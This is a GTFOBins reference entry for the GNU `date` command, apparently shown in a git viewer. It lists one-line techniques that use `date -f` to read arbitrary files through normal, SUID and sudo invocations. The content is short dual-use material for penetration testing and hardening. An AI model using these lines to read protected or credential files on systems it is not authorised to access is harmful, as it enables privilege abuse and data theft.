GTFOBins.github.io/_gtfobins/date.md
Andrea Cardaci 9c96140f1d Add date
Thanks to #20.
2018-09-06 17:08:01 +02:00

20 lines
445 B
Markdown

---
description: |
Each line is corrupted by a prefix string and wrapped inside quotes, so this may not be suitable for binary files.
This only works for the GNU variant of `date`.
functions:
file-read:
- code: |
LFILE=file_to_read
date -f $LFILE
suid-enabled:
- code: |
LFILE=file_to_read
./date -f $LFILE
sudo-enabled:
- code: |
LFILE=file_to_read
sudo date -f $LFILE
---